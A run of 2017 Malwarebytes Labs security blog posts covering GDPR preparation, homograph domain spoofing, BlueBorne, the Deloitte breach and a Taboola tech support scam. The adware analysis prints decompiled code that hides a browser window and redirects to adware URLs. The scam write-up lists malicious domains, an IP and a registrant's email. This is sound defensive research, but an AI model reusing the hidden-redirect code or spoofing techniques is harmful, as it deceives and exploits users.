The post A new kind of Apple phishing scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Make way for the GDPR: Is your business ready?

Malwarebytes - Tue, 10/10/2017 - 17:13

In Week 2 of National Cyber Security Awareness Month (NCSAM), the spotlight is on businesses—particularly, their more profound need to take cybersecurity seriously in this age of breaches. And what better way for them to start this off than to think about how they can improve on handling and storing their clients’ data safely and securely?

If this sounds more like a privacy issue to you, it is. What many should realize is that privacy and security are closely linked. In fact, one cannot think of improving on privacy without improving on security as well, and vice versa.

With the coming of the General Data Protection Regulation (GDPR), a chiefly privacy-focused ruling for companies doing business in Europe, in less than nine months time, a majority of B2C and B2B organizations in the US still have a lot of catching up to do in the matter of compliance. So, without much ado, let’s get down to the nub of what to do to prepare for GDPR’s approach.

Read: National cybersecurity awareness month: simple steps for online safety

  • Prioritize. Senior management must be on board with preparations needed for change to happen. The GDPR is not something your IT department can handle on their own. In fact, the GDPR transcends the boundaries of IT and extends to other areas in the organization, such as marketing and sales. It’s high time for companies to wake up and act fast by putting cybersecurity and data privacy at the top of their priority list.
  • Assess. Take the time to sit down and review your current and target customer base. This is a crucial stage as results will dictate whether your business must comply with GDPR standards or not. (Though a bulk of US businesses are small businesses, and not all of them cater to European and UK citizens, even with an online presence.) If your company does handle personal data from citizens of European member states, ascertain what types of data you currently transmit, process, and store. Also, weigh the value of each data type you are storing. Ask yourself this: “Does the company really need to keep this data? Does this bring sufficient value to the company?” If both answers are “no,” it might be best to get rid of it.In June, popular pub and hotel chain, JD Wetherspoons, decided to delete their full database of client email addresses, which they had used to send email newsletters, after evaluating that they don’t want to hold them anymore. Instead, they decided to use social media to notify patrons of deals and special offers.

    Here are other questions to guide you in your assessment:

    • How do you get personal data from your clients? (e.g., forms in company website)
    • Where do you store client personal data? (e.g., PC hard drive, the cloud)
    • How do you protect stored data?
    • Where are client data backups kept? (e.g., removable storage media)
    • Are their gaps in the current processes or controls you already have in place?
  • Hire. Having a Chief Protection Officer (CPO) or Data Protection Officer (DPO) may be crucial, yet not every organization that controls or processes user data must have a DPO. The GDPR explicitly requires authorities that (1) process personal data, (2) handle a lot of data, and (3) manage “special categories of personal data”—genetic, biometric, and health data, to name a few—to hire or appoint a DPO. Its principal role is to ensure that companies remain compliant with GDPR standards.Organizations who merely don’t have the time or resources to prepare may decide to hire a third-party consultant to help them out, and this is fine, too.
  • Plan. Draft a data protection and mitigation plan that best suits your company. Following a template doesn’t cut it anymore. Plans must be customized to address or reduce the risks that come with how a business processes data. Also, firms with privacy policies in place must revamp them to cover extended rights that are given to EU and UK nationals. To guide you on how to go about doing this, try answering these questions:
    • How will you keep the stored data safe? (e.g., encryption)
    • How should you handle requests from clients to delete their data?
    • How can you make data available to clients?
    • How can you make client data portable?
    • What should your incident response, in the event of a breach, look like?
  • Implement. Now that you made the assessment, hired a consultant, and answered the questions and planned around them, it’s time to put those plans into action. Start backing up files, encrypting them if you think it’s necessary, limiting access to sensitive data to specific individuals only, training up your staff about your security and privacy policies, and making sure that all your supply chains have been informed and confirmed to be on board with the changes.
  • Test. If you have envisioned and drafted an incident response plan, you should put it to the test. See how well the relevant teams in your organization handle a pretend breach based on the new protocol, identify the good points and bad points from it, and make the necessary adjustments to remove or at least minimize the latter. After changes are made, further refine the terms by testing them again and again.
  • Persevere. Starting is one thing, but keeping your plan in place is another. Businesses must continue to remain compliant in the long term by doing a continuous assessment and process improvement. This also includes the regular training of employees and continuing to adhere to a culture of security and privacy in the workplace.

The coming of the GDPR has caused a lot of businesses to recoil out of fear and hype. Unfortunately, this also resulted in them putting off making the much-needed improvements to their data processing activities and security. While there are penalties for non-compliance, this shouldn’t be the main reason why companies must go through the ordeal of what we have listed above. It all boils down to businesses taking better care of their clients by protecting their data. Not only will this foster customer loyalty, but it also allows the company to stay in business.

The post Make way for the GDPR: Is your business ready? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 02 – October 08)

Malwarebytes - Mon, 10/09/2017 - 20:26

Last week, we gave you some tips for National Cybersecurity Awareness Month, walked through an exploration of a small adware file, and explored the complicated world of the Homograph attack. Here’s what else happened in security.

VB2017

Many of our team members attended VB2017 in Madrid, one of the premier yearly security conferences that brings together researchers, companies, law enforcement, and more in an effort to explore the latest security research. Here’s a collection of articles from The Register’s John Leyden, who was in attendance:

  • Bulletproof hosts stay online by operating out of disputed backwaters: A look at how dubious hosts are retreating to places where they can continue to offer dubious services.
  • Spy vs. spy vs. hacker vs… who is THAT? Everyone’s hacking each other: The problem of Intel gathering when everyone is muddying the waters.
  • Hey, IoT vendors. When a paediatric nurse tells you to fix security, you definitely screwed up: The alarming world of IoT medical devices.
  • Avast urges devs to secure toolchains after hacked build box led to CCleaner disaster: An interesting look at the timeline behind the recent CCleaner issues.
  • Video games used to be an escape. Now not even they are safe from ads: My own talk, where I explore the long(ish) history of Advergaming, tricks used to force you to look at ads in games, and how it threatens to reshape many of your real-world interactions via augmented reality. Once the VB talks are uploaded to YouTube, I’ll be linking to many of them.
Other news

Stay safe everyone!

The post A week in security (October 02 – October 08) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Out of character: Homograph attacks explained

Malwarebytes - Fri, 10/06/2017 - 15:00

In April, Xudong Zheng, a security enthusiast based in New York, found a flaw in some modern browsers in the way they handle domain names. While Chrome, Firefox, and Opera already have security measures in place to cue users that they might be visiting a destination they thought was legitimate, at that time these browsers did not flag a fake domain name that used all Latin look-alike characters taken from another foreign language. Zheng demonstrated this when he created and registered a proof-of-concept (PoC) page for the domain, аррӏе.com, which was written in pure Cyrillic characters.

What is a homograph attack?

A homograph attack is a method of deception wherein a threat actor leverages on the similarities of character scripts to create and register phony domains of existing ones to fool users and lure them into visiting. This attack has some known aliases: homoglyph attack, script spoofing, and homograph domain name spoofingCharacters—i.e., letters and numbers—that look alike are called homoglyphs or homographs, thus the name of the attack. Examples of such are the Latin small letter O (U+006F) and the Digit zero (U+0030). Hypothetically, one might register bl00mberg.com or g00gle.com and get away with it. But in this day and age, such simple character swaps could be easily detected.

In an internationalized domain name (IDN) homograph attack, a threat actor creates and registers one or several fake domains using at least one look-alike character from a different language. Again, hypothetically, one might register gοοgle.com, but not before swapping the Latin small letter O (U+006F) with the Greek small letter Omicron (U+03BF).

Zheng’s PoC is another example of an IDN homograph attack, so let’s list down each character he used to illustrate how this particular attack can be highly successful and dangerous if used in the wild. Interestingly, an operating system’s typeface of choice could make it easy or difficult for users to visually differentiate non-Latin characters from Latin ones.

Table 1: We used Segoe UI, Microsoft’s system-wide typeface, here.

To the human eye, these Cyrillic glyphs can easily be confused with their Latin counterparts. Computers, however, read these confusables differently, as we can see from the different hex codes assigned to them.

Table 2: We used San Francisco, Apple’s system-wide typeface, here. It’s worth noting that OSX distinguishes the Cyrillic small letter Palochka from the Latin small letter L; however, it cannot show the difference between the Latin small letter L with the Latin capital letter I, as per the text “Cyrillic small letter Ie”.

According to this bug report, it seems that even the system-wide font for Linux doesn’t distinguish confusable characters either.

The use of all-Cyrillic glyphs—or any other non-Latin characters for this matter—for domain names isn’t the problem. IDN has made it possible for internet users around the globe to create and access domains using their native language scripts. The problem is when these glyphs are misused to deceive internet users.

Is this a new form of online threat?

Homograph attacks have been around for years. As far as we know, Zhang’s PoC was the first of its kind to make headlines and spark a conversation among internet users.

Below are other examples of homographed domains and how they were used:

  • To raise awareness, a security consultant highlighted the common misconception that sometimes a Latin capital letter I (U+0049) looks similar to a Latin small letter L (U+006C) by registering a fake Lloyds Bank website and adding an SSL certificate to it to make it look as legitimate as the real one.
  • A security researcher from NTT Security shared his experience about a friend of his who received several Google Analytics spam containing the domain, secret[DOT]ɢoogle[DOT]com. The “ɢ” there wasn’t the Latin capital letter G (U+0047) but a Latin letter small capital G (U+0262).
  • A security researcher from NewSky Security found an impersonated Adobe website serving the Betabot malware, pretending to be an Adobe Flash Player installer file. The threat actor used the Latin small letter B with Dot below (U+1E05) to replace the Latin small letter B (U+0062) in “adobe.com”.
How is this different from typosquatting?

Although typosquatting also uses visual tricks to deceive users, it relies heavily on users mistyping a URL in the address bar, hence, the “typo” in its name.

Are all homograph attacks just phishing attacks?

Not necessarily. Although homograph attacks usually involve phishing threat actors could create fake yet believable websites for other fraudulent purposes or to introduce malware onto user systems, as is the case of the bogus Adobe website we mentioned earlier.

In this in-depth report about IDN homograph attacks, our friends at Symantec have noted that several homographed domains they found were either part of a malvertising network, hosting exploit kits and malicious mobile apps, or generated by botnets.

How can we protect ourselves from homograph attacks?

Browser tools have been created, such as Punycode Alert and the Quero Toolbar, to aid users in alerting them of potential homograph attacks. Users have the discretion of adopting them alongside the built-in security mechanisms in today’s browsers. However, no tool can replace vigilance when browsing online and a solid cybersecurity hygiene. This includes:

  • Regularly updating your browser (They may be your first line of defense against homograph attacks)
  • Confirming that the legitimate site you’re on has an EVC
  • Avoid clicking links from emails, chat messages, and other publicly available content, most especially social media sites, without ensuring that the visible link is indeed the true destination.

Remember: Eyes open.

Stay safe!

 

Additional reading(s):

 

Resource:

 

The Malwarebytes Labs Team

The post Out of character: Homograph attacks explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Using ILSpy to analyze a small adware file

Malwarebytes - Thu, 10/05/2017 - 16:19

My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called grandfather.exe, so I went out to grab a copy and have a look at it.

As you can probably tell from some of the detection names at Virustotal, this is a MSIL (Microsoft Intermediate Language) file. There are a lot of tools to decompile MSIL executables, but ILSpy is my personal favorite. To demonstrate why, I will show you how I analyzed this very small executable that is part of the Adware.Dotdo family.

Using ILSpy

Once you have downloaded and unzipped the binaries from their site, you can run ILSpy.exe and click File > Open to navigate to the file that you like to look at.

One advantage of ILSpy is that the code is shown in a very clear format. Even knowing how to read pseudocode and where to find .NET documentation will get you a long way, as I’m about to demonstrate.

The code in the example

Code is shown in C# format

In this code slice, where the most important part of the program is initialized, we see three methods of hiding the program parts from the user:

  • The program will not be shown in the taskbar
  • The opacity is set at 0% which means you will see right through it
  • And the program will not show any error prompts in case any script errors occur

By the way, if you are more comfortable with coding or reading code in VB.net, you can set ILSpy to show the code in that format.

Code is shown in VB format
(click to enlarge)

The strings in the code above have been obfuscated in a very simple way. Just enough to throw someone who is merely looking at strings off track.

After applyingReplace("28851129", string.Empty)), which is added to all the strings in that part of the code, this is what’s left of the two functions that will later be used as event handlers:

 

Private Sub ie(sender As Object, e As EventArgs)

Me.i.AllowNavigation = True

Me.i.Navigate("http://www.munificentspitz.pw/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&pianoforte=01A0oKsMVTiSlSZzVJC1")

End Sub

 

The event handler above simply navigates to the obfuscated URL.

 

Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)

If Me.i.Document.Title <> "searchbox"  Then

Me.i.Navigate("http://www3.munificentspitz.pw/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&pianoforte=01A0oKsMVTiSlSZzVJC1")

End If

End Sub

 

This event handler determines where the browser connects to, based on the title of the current document. If the title of the site does not match “searchbox” then it simply redirects the user to the URL that is obfuscated. If the title already is “searchbox” it will do nothing.

This is where the browser control (‘this’) is initialized while the layout of the main Window (‘base’) is postponed until the browser is ready to go. All the control’s edges are docked to the edges of its containing control and sized appropriately. The browser will resize to fit all of the empty space in its parent container with the DockStyle.Fill property set.

Then the location, size, and name are set, but also the control is hidden by setting the “.visible” property to “false”.

When the new document is fully loaded, the DocumentCompleted event occurs, and the event handler is the (lightly) obfuscated function we discussed earlier, so that will be triggered.

The AutoScaleDimensions property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property will be set by the Windows Forms designer to the value your monitor is currently using. The “Font” is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.

Then after the browser control has been added to the base application, the first event handler is called which, as mentioned earlier, hides the main window and initializes the browser.

Summary

The “program” stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention to fetch further instructions. At the moment of writing, the site contains two iframes connecting to videojelly[.]com and whos.amung[.]us, a visitors counter.

I tried to show why I like ILSpy as a tool to decompile .NET and browse the assembly.

The file we looked at has:

SHA-256              53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240

Grandfather.exe is now detected as Adware.Dotdo.

 

Pieter Arntz

The post Using ILSpy to analyze a small adware file appeared first on Malwarebytes Labs.

Categories: Techie Feeds

National cybersecurity awareness month: simple steps for online safety

Malwarebytes - Mon, 10/02/2017 - 19:00

With each new devastating breach of security—Equifax, Deloitte, and Sonic, to name a few recent cyber fails—the need for increased cybersecurity awareness has never been more apparent. It’s a good thing, then, that this month is National Cybersecurity Awareness Month (NCSAM).

Observed every October since 2004, NCSAM was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. According to the Department of Homeland Security, NCSAM was designed to “engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the nation in the event of a cyber incident.”

NCSAM is broken down into weekly themes, including online safety for consumers, securing business networks, looking ahead to the security of future technologies, careers in cybersecurity, and securing infrastructure.

And now Malwarebytes is doing its part. Each week on Labs, we’ll focus on a theme and provide helpful articles, useful tips, and valuable analysis so that you can increase awareness and spread the word. This week’s theme: simple steps to online safety.

Week 1 of NCSAM features the STOP. THINK. CONNECT. campaign, which provides easy, actionable advice for safe surfing. STOP: make sure security measures are in place. THINK: about the consequences of your actions and behaviors online. CONNECT: and enjoy the Internet.

Sounds pretty simple, right? But what exactly does it mean? Here’s our interpretation.

Make sure security measures are in place

It’s often mind-numbing to think about all the things you should and shouldn’t be doing online. Here’s where you use technology to do the heavy lifting. Make sure you’ve got the following equipped on your home computer:

  • Firewall
  • Cybersecurity program that includes technology to block malware, ransomware, adware, and other advanced threats
  • Password manager
  • Wifi secured with password (for mobile devices/streaming)

To learn more about how to proactively protect against various forms of cybercrime, take a look at a few of our articles:

How to beat ransomware: prevent, don’t react

10 easy ways to prevent malware infection

Top 10 ways to secure your mobile phone

Why you don’t need 27 different passwords

With these in place, you can keep out a good chunk of the bad stuff, even if you “misbehave” online. However, human error still accounts for a lot of infections. So that’s why the next step is important.

Think about the consequences of your actions and behaviors online

Sure, you may have layers upon layers of security in place, and that’s going to help. But if you invite a criminal into your home, you’ve pretty much negated any security system you might have deployed. And that’s what happens when you ignore basic online hygiene.

To refresh your memory, there are a few things you need to keep an eye out for/be skeptical of:

  • Tech support scams (Microsoft won’t call you)
  • Phishing emails (is this really your bank asking you to update personal info?)
  • IRS phone calls/texts/emails (they mail you letters)
  • Online shopping on unsecured sites (look for the lock next to the URL)

We could go on, of course, but this general advice is good for all actions online: Does it seem too good to be true? If so, it probably is. Always treat information you encounter with a good sense of skepticism. And for more detailed advice, you can check out these Labs articles:

Tech support scams help and resource page

Something’s phishy: How to detect phishing attempts

Hacking your head: How cybercriminals use social engineering

Connect and enjoy the Internet

If you’re securing your home computer with the proper technologies and making cybersecurity awareness a priority (and if you’ve read this far, that means you are), then you can safely connect to the Internet and enjoy all the cat videos you want to your heart’s content. Sadly, there’s no such thing as being 100 percent secure—online or in life—but you can breathe easier knowing you’re doing the right things and acting responsibly.

Now onward! Go forth, spread the word, and stay tuned for NSCAM’s Week 2 theme: cybersecurity in the workplace is everyone’s business.

Happy surfing!

The post National cybersecurity awareness month: simple steps for online safety appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 25 – October 01)

Malwarebytes - Mon, 10/02/2017 - 16:59

Recently, we talked about the hacking incident at Deloitte, one of the ‘big four’ global accounting firms. It was reported that client email addresses, usernames, and passwords were exposed. This also brought to light weaknesses in their policies and lack of threat intelligence to recover leaked data. We advised Deloitte clients the following: do an inventory of email addresses used to correspond with the company, review network outbound traffic, determine what possible information might have leaked from the hack, and (more importantly) maintain security best practices to avoid repeating hacks like this from happening.

Patrick Wardle, an acclaimed security researcher, found a keychain vulnerability flaw in High Sierra, Apple’s new macOS operating system. This revelation, unfortunately, spurned a lot of articles that one may deem bordering FUD (fear, uncertainty, doubt). So our resident Mac expert, Thomas Reed, set some records straight.

Senior Malware Analyst Nathan Collier likened BlueBorne, the new attack vector using Bluetooth technology, to influenza. First discovered by Armis Labs, BlueBorne can potentially affect billions of devices across multiple platforms. In the piece, Collier stressed the importance of Bluetooth security and agreed with Armis’s prediction that Bluetooth vulnerabilities would continue to be seen in the future.

Lastly, Lead Malware Intelligence Analyst Jérôme Segura discussed some discoveries last week about cryptocoin mining, malvertising, tech support scam, and targeted attacks.

Segura revealed a questionable trend on the rise where website publishers would mine for cryptocurrencies from user machines while on their sites. He also pictured a scenario where mining is also tied with malvertising. Scammers abused Taboola, a global discovery platform, to redirect users from a promoted story to a tech support scam page.

Segura, together with David Sánchez, wrote about an espionage attack against the Saudi Arabia government in an effort let readers understand how the malware entered their target systems and kept in touch with its C&C.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Responsible Vulnerability Disclosure Is Becoming An International Norm. “More and more countries are joining the United States in adopting a policy of weighing the pros and cons of responsible vulnerability disclosure, as the public calls for more clarity regarding intelligence agencies and their supposed hoarding of previously undiscovered software flaws” (Source: Cyberscoop)
  • Mobile Stock Trading App Providers Unresponsive to Glaring Vulnerabilities. “Researchers from IOActive today published a report describing the scope of the security issues. More concerning, however, is the lack of response from the respective financial firms. Of the 21 apps in question, researcher Alejandro Hernandez said he sent detailed private disclosures to 13 brokerage firms and only two had acknowledged the reports as of Monday.” (Source: Threatpost)
  • XPCTRA Malware Steals Banking And Digital Wallet User’s Credentials. “The malspams used in the campaign try to induce the victim to open a supposed bank bill link. It actually leads to the download of the XPCTRA dropper, that is, the part of the malware responsible for environment recognition and downloading new components. Once executed, it initiates a connection with an Internet address to download other malware parts responsible for later malicious actions.” (Source: SANS Internet Storm Center)
  • Android Unlock Patterns Are A Boon For Shoulder Surfing Attackers. “The ‘swiping’ unlock patterns typical for Android devices are considerably easier for attackers to discern than PIN combinations. In fact, after only one observation of a user entering the pattern, 64% of shoulder surfing attackers will be able to reproduce it, a group of researchers from the US Naval Academy and the University of Maryland Baltimore County has found.” (Source: Help Net Security)
  • Police: Buying Fake Goods Online Can Lead to ID Theft. “The City of London Police has shut down 28,000 websites selling counterfeit goods over the past three years, many of which were registered with stolen identities, it has revealed. Over 4000 sites were created using the identities of unsuspecting members of the public, according to the force, which released the figures as part of a new awareness campaign.” (Source: Infosecurity Magazine)
  • No, Facebook Spies Aren’t Secretly ‘Following Me’, It’s A Hoax. “According to the nonsense debunkers over at Snopes, the hoax debuted in January 2017.” (Source: Sophos’s Naked Security Blog)
  • Sudden Rise Detected in Faceliker Malware That Manipulates Facebook ‘Likes’. “The Faceliker malware is not new, being spotted years back, and is a generic detection that describes malware that takes over users’ browsers and uses JavaScript code to perform click-jacking, giving Facebook “likes” to content received from a central command and control server.” (Source: Bleeping Computer)
  • Duo Security Discovers Apple Mac Computers Unprotected from Malicious Firmware Vulnerabilities. “The report shows Mac users who have updated to the latest operating system (OS) or downloaded the most recent security update may not be as secure as they originally thought. A Duo Labs analysis of over 73,000 real-world Mac systems gathered from users across industries found the Extensible Firmware Interface (EFI) in many popular Mac models was not actually receiving the security updates users thought. This left users susceptible to previously disclosed vulnerabilities such as Thunderstrike 2 and the recent WikiLeaks Vault 7 data dumps that detail attacks against firmware.” (Source: Duo Security)
  • Uber London Ban Sees Rise In Malicious Taxi Apps. “Security researchers have warned of a rise in malicious apps masquerading as legitimate taxi-hailing services, as cyber-criminals look to capitalize on Transport for London (TfL)’s recent decision to ban Uber.” (Source: Infosecurity Magazine)
Latest updates for Businesses
  • Criminal Hacking: Top Technology Risk To Health, Safety And Prosperity. “Americans believe criminal hacking into computer systems is now a top risk to their health, safety and prosperity. Criminal hacking, a new ESET survey finds, outranks other significant hazards, including climate change, nuclear power, hazardous waste, and government surveillance.” (Source: Help Net Security)
  • Three Out Of Four DDoS Attacks Target Multiple Vectors. “Three out of every four DDoS attacks employed blended, multi-vector approaches in the second quarter of 2017, according to Nexusguard. The quarterly report, which measured more than 8,300 attacks, demonstrated that hackers continued to rely on volumetric attacks to overwhelm system resources.” (Source: Help Net Security)
  • Why Your Business Must Care About Privacy. “The current conversation often pits privacy against security, both in consumer and enterprise settings. This is especially true in the debate over whether mobile encryption is essential for the average user. However, not wanting to have personal information shared, acted on, or used by anyone without permission should be seen as a universal right.” (Source: Dark Reading)
  • Shocker? Companies Still Unprepared To Deal With Ransomware. “Companies and government agencies are overwhelmed by frequent, severe ransomware attacks, which have now become the #1 cyber threat to organizations, according to Crowd Research Partners.” (Source: Help Net Security)
  • Healthcare Sector Reports Greatest Number Of Security Incidents. “McAfee Labs saw healthcare surpass public sector to report the greatest number of security incidents in Q2, while the Faceliker Trojan helped drive quarter’s 67% increase in new malware samples from the social media landscape.” (Source: Help Net Security)

Safe surfing, everyone!

 

The Malwarebytes Labs Team

The post A week in security (September 25 – October 01) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

BlueBorne – Bluetooth’s airborne influenza

Malwarebytes - Fri, 09/29/2017 - 15:00

Armis Labs has discovered a new attack vector that targets any device that has Bluetooth capability. This includes mobile, desktop, and IoT — roughly accounting for 8.2 billion devices. All operating systems are susceptible — Android, iOS, Windows, and Linux. Dubbed BlueBorne, it exposes several vulnerabilities in the Bluetooth technology. These vulnerabilities open up the potential to perform an array of malicious attacks. Some of which, stated by Armis, are as follows:

  • Take control of devices
  • Access corporate data and networks
  • Break into secure networks that use air gap security measures
  • Spreading malware thatise in range of device with infection

BlueBorne does not require Bluetooth devices to be paired to other devices to be exploited. Even worse, devices are susceptible even when Bluetooth is in non-discoverable mode.

The ease of exploitation

What exactly does it take to exploit these new-found Bluetooth vulnerabilities? As noted in the Armis Labs BlueBorne whitepaper, the first step to is to steal the BD_ADDR (Bluetooth Device address). This is a hardcoded 48 bit MAC address of the Bluetooth device. Stealing the BD_ADDR the Bluetooth device, especially when it is set to non-discoverable, used to be considered a feat.  With the introduction of new Bluetooth “sniffing” hardware, this has become a lot easier. One such device is the open source hardware Ubertooth which plugs into a USB port of a computer.  Simply be within range with the Ubertooth plugged in, and it will grab any Bluetooth traffic from the air. With the help of some other monitoring tools to analyze the traffic — voilà — you have BD_ADDRs.

Spreading malware via Bluetooth

One of the more intriguing attacks is the potential to propagate malware using BlueBorne vulnerabilities. More specifically, through mobile devices.

The only way I could hypothesize this happening is through an attack using a list of collected BD_ADDRs and then creating a malicious app which scans for those addresses. Any device within range on the list becomes a target. Using the BlueBorne vulnerabilities to propagate itself, the malicious app transfers to the target device. Keep in mind the user of the target device would need to accept installing the malicious app as well.

All this isn’t impossible, but unlikely with the limitation of requiring a list of BD_ADDRs. Now if a mobile device could steal BD_ADDRs for itself — which it can’t at this point — then we should start worrying.

So how bad is it?

The work done by Armis Labs to present the BlueBorne vulnerabilities is extremely valuable to the security industry. It highlights the need for improved Bluetooth security. I applaud them for their hard work in this endeavor.

The introduction of sniffing hardware like Ubertooth and the creation of other open-source tools to analyze the collected traffic like Kismet have taken down the toughest barrier for hackers — collecting the BD_ADDR. With this exposure, I agree with Armis Labs predication — we will continue to see more Bluetooth vulnerabilities arise.

The requirement of having to be within Bluetooth range creates a limitation to BlueBorne. I believe this limitation will isolate it to more targeted attacks — most likely against specific companies.  In this case scenario, a spear phishing attack would be much easier to carry out and wouldn’t require being physically within Bluetooth range. Therefore, I’m skeptical that we will see BlueBorne implemented in a real-world attack.

Disabling Bluetooth

Bluetooth, by default, is enabled. If you don’t use Bluetooth i.e. you don’t have any devices paired, it’s best to disable it. If you do use your Bluetooth, disabling it when not in use is the most secure option against BlueBorne. However, many use their mobile devices to pair with their vehicle’s handsfree unit. Ideally, remembering to enable/disable Bluetooth depending on whether you’re driving or not is the best option. Not as ideal and more likely, you will forget to enable Bluetooth before starting to drive — myself included. Therefore, you have to weigh what is more of a threat. A BlueBorne attack or looking at your phone to enable Bluetooth WHILE driving? Just something to think about.

The post BlueBorne – Bluetooth’s airborne influenza appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Deloitte breached by hackers for months

Malwarebytes - Thu, 09/28/2017 - 16:00

On September 25, 2017, Deloitte announced that they detected a breach of the firm’s global email server via a poorly secured admin email in March of this year. Further, the attackers most likely had control of the server since November of 2016. Deloitte’s initial statement indicated that only six of their consultancy clients were impacted by the breach, but insider sources later disclosed to the media that the attack most likely compromised every admin account at the firm. The startling severity of the breach has brought attention to Deloitte’s other cybersecurity practices, which, as we can see here with a likely Active Directory server, are not ideal. (There are valid applications for self-signed certificates, but the larger problem here is that the server is exposed to the outside internet at all, running unnecessary services.)

An admin account subversion is not very shocking, given that a significant number of Deloitte email accounts can be found on paste sites, most of a low complexity suggesting the firm has minimal password policies, and lack of a threat intelligence capacity to identify and recover leaked PII. A quick scan of pastebin.com showed a significant amount of Deloitte data from various locations, going back five years. A portion of those pastes were email credentials – the primary breach vector – as shown below.

What you should do if you’re a Deloitte cybersecurity client
  • First and foremost, take a quick inventory of your own corporate email accounts that have corresponded with the company. Accounts with normal network privileges could benefit from a password reset. Those with elevated privileges should be reviewed for accesses and unusual activity. It’s not unheard of for attackers to breach an ancillary services firm in furtherance of an attack on the main target.
  • Do Deloitte consultants have accounts on your network? You can review outbound traffic on these hosts to make sure it matches with their work role.
  • Maintain your own threat intelligence capacity to identify work product that might be leaked on paste sites. Enormous breaches like this one are quickly monetized on the dark web, with data eventually filtering out for public use. You can’t prevent third party access to your data, but you can find it in a timely manner, and serve a takedown request accordingly.
  • Don’t repeat their mistakes. Best practices for enterprise security are widely written about and publically available. While security is generally seen as a cost center, it would be more accurate to describe it as an investment in public trust. And without trust, how profitable could your enterprise possibly be?
Conclusion

Third-party breaches are occurring at an accelerating rate. While outsourcing data security to a popular vendor checks off the “security box,” there is no good substitution for in-house expertise that knows the business as well as security. Good security now is an investment in stable capital growth later. Building in-house talent to facilitate that growth can put you ahead of the curve before the next breach happens.

The post Deloitte breached by hackers for months appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Tech support scammers abuse native ad and content provider Taboola to serve malvertising

Malwarebytes - Thu, 09/28/2017 - 14:58

A large number of publishers – big and small – are monetizing their sites by selling space for companies that provide so-called native advertising, cited as more effective and engaging than traditional banner ads.

Indeed, on a news or entertainment site, users are more inclined to click on links and articles thinking that they are one and the same, not realizing that those are actually ‘sponsored’ and tied to various third-party providers.

Rogue advertisers have realized this unique opportunity to redirect genuine traffic towards their own infrastructure where they can subject their audience to whatever content they wish.

Case in point, we caught this malvertising incident on MSN.com, the Microsoft web portal that attracts millions of unique visitors. While clicking on a story promoted by Taboola – a leading global discovery platform which Microsoft signed a deal within 2016 – we were redirected to a tech support scam page. The warning claims that our computer has crashed and that we must call a number for immediate assistance.

Figure 1: Automatic redirection from click on promoted story to scam page

The fraudulent page cannot be closed normally because it uses code that repeats the warning indefinitely. Unfortunately, this is enough to scare many folks and trick them into calling what they think is Microsoft support. Instead, they will be dealing with fake technicians whose goal is to extort hundreds of dollars from them.

Decoy news page hides real intentions

Rogue actors typically start creating content just like any other advertiser would and build up a profile. After all, they want to appear genuine in order to game the system with ‘hot’ content.

What’s determined as hot can be derived from real or shocking news. The point is to do a little bit of market study on what the most searched for stories or keywords are in order to attract traffic.

In this malvertising example, if we review the sequence of events, we realize that the scammer created a bogus news site (infinitymedia[.]online) which does have actual content but is performing conditional redirects, also known as ‘cloaking’.

Figure 2: Traffic view showing temporary hop via decoy news site

A conditional redirect is usually a server-side mechanism that profiles the user and returns a particular response. For instance, if the server determines that a bot or crawler is making a request, it may in turn either deny it or simply serve the expected content (decoy). Similarly, if the user is running Internet Explorer, is from North America and their IP address appears to have hit the server for the first time, they may receive a scammy page instead.

The point is that it’s trivial to play a Dr. Jekyll and Mr. Hyde kind of game and serve the content you want. The fraudulent advertiser did create various pages with impactful keywords (potentially for Search Engine Optimization purposes) and can also use those stories as a decoy:

Figure 3: Stories designed for click-bait

To get back to this malvertising incident on MSN, the user was conditionally redirected to another site (the tech support scam page), and never saw the content they were looking for.

Figure 4: The 302 redirect call from the fake news site to the scam page

To show that this was no mere ‘coincidence’, we can look at the ownership of the ‘news’ site (infinitymedia[.]online) and see how it links to the tech support domain name (4vxadfcjdgbcmn[.]ga). A WHOIS lookup for infinitymedia[.]online returns the following information:

Domain Name: INFINITYMEDIA.ONLINE Creation Date: 2017-05-23T05:14:50.0Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrant Name: bhanu Registrant Country: IN Registrant Email: bhanutomar90nk@gmail.com

A cursory review using RiskIQ’s PassiveTotal of recently created domains using the same email address shows a tendency for this actor to register tech support scams domains:

Figure 5: Domains recently registered by the actor behind the decoys news sites

Still, we don’t have a clear connection to 4vxadfcjdgbcmn[.]ga which does not have an identifiable registrant. Indeed, the .GA Top Level Domain (TLD) is comprised of free domain names and their registrant is… Gabon TLD B.V.

However, this particular actor made the mistake of reusing the same host server for domains he had created before. For example, if we take micro-soft-system-alert2[.]online which is registered to his email address, we notice that it resolves to 108.167.146.132, a server full of tech support scams and phishing sites, including the one used in this particular malvertising attack, namely 4vxadfcjdgbcmn[.]ga.

Figure 7: Connecting the fake news sites to the tech support domain

Further inspection of other properties tied to bhanutomar90nk@gmail.com shows similar bogus ‘news’ sites:

hollywoodreporter[].online latestnynews[.]online theonlytimesnews[.]xyz uk-times-news[.]xyz unitedtimesnews[.]xyz 247breakingnews[.]xyz 247-breakingnews[.]xyz thenewyorktimenews[.]xyz

There is no doubt that this actor has very clear intentions and has turned high-profile stories into a click-bait lead generation tool for tech support scams.

Banner ads versus native advertising

